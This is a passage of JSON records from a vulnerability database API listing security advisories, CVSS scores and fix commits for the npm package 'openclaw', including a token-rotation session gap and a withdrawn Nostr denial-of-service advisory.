CID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41378","GHSA-gjm7-hw8f-73rq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yp2w-pc58-9bf6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89997?format=json","vulnerability_id":"VCID-ywrn-52gx-f3ad","summary":"OpenClaw: Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation\n## Summary\nGateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 rotates device tokens without disconnecting already-authenticated WebSocket sessions, which is a real but post-compromise revocation gap.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `91f7a6b0fd67b703897e6e307762d471ca09333d` — 2026-03-31T09:05:34+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41356","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41356"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"}],"url":"https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41356","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41356"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-in-device-token-rotate","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-in-device-token-rotate"},{"reference_url":"https://github.com/advisories/GHSA-rfqg-qgf8-xr9x","reference_id":"GHSA-rfqg-qgf8-xr9x","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rfqg-qgf8-xr9x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41356","GHSA-rfqg-qgf8-xr9x"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ywrn-52gx-f3ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89498?format=json","vulnerability_id":"VCID-z3rc-xpx7-fkcu","summary":"Duplicate Advisory: OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-65h8-27jh-q8wv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cryptographic and dispatch operations on inbound Nostr direct messages before enforcing sender and pairing policy validation. Attackers can trigger unauthorized pre-authentication computation by sending crafted DM messages, enabling denial of service through resource exhaustion.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"},{"reference_url":"https://github.com/advisories/GHSA-2j53-2c28-g9v2","reference_id":"GHSA-2j53-2c28-g9v2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2j53-2c28-g9v2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VC